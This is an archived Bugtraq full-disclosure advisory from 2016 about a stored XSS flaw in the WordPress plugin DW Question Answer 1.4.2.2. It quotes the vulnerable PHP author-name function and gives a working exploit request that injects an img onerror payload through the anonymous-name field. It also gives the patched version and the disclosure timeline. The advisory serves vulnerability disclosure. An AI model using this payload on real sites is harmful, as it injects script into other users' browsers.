lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 11 Mar 2016 11:31:44 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: bugtraq@...urityfocus.com
Subject: DW Question Answer Stored XSS Vulnerability

## FULL DISCLOSURE
 
#Product : DW Question Answer
#Exploit Author : Rahul Pratap Singh
#Version : 1.4.2.2
#Home page Link : https://wordpress.org/plugins/dw-question-answer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 11/3/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"_dwqa_anonymous_name" parameter is not sanitized that leads to Stored XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------

User.php
 
function dwqa_get_author( $post_id = false ) {
if ( !$post_id ) {
$post_id = get_the_ID();
}
 
$display_name = false;
if ( dwqa_is_anonymous( $post_id ) ) {
$anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true );
if ( $anonymous_name ) {
$display_name = $anonymous_name;
} else {
$display_name = __( 'Anonymous', 'dwqa' );
}
} else {
$user_id = get_post_field( 'post_author', $post_id );
$display_name = get_the_author_meta( 'display_name', $user_id );
}
 
return apply_filters( 'dwqa_get_author', $display_name, $post_id );
}
----------------------------------------
Exploit:
----------------------------------------

POST /index.php/dwqa-ask-question/ HTTP/1.1

question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-category=2&question-tag=abc&_dwqa_anonymous_email=
abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+
onerror%3Dalert%281%29%3E%3C%21--&_wpnonce=
3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&dwqa-question-submit=Submit

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/03/dwqa_stored_xss.png

Fix:
Update to 1.4.2.3

Vulnerability Disclosure Timeline:
→ March  3, 2016  – Bug discovered, initial report to WordPress
→ March  7, 2016  – No response, Report sent again.
→ March  8, 2016  – WordPress response, plugin taken down
→ March 11, 2016  – Vendor deployed a patch

#######################################
#                 CTG SECURITY SOLUTIONS             #
#                www.ctgsecuritysolutions.com         #
#######################################

Pub Ref:
https://wordpress.org/plugins/dw-question-answer/changelog/


Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ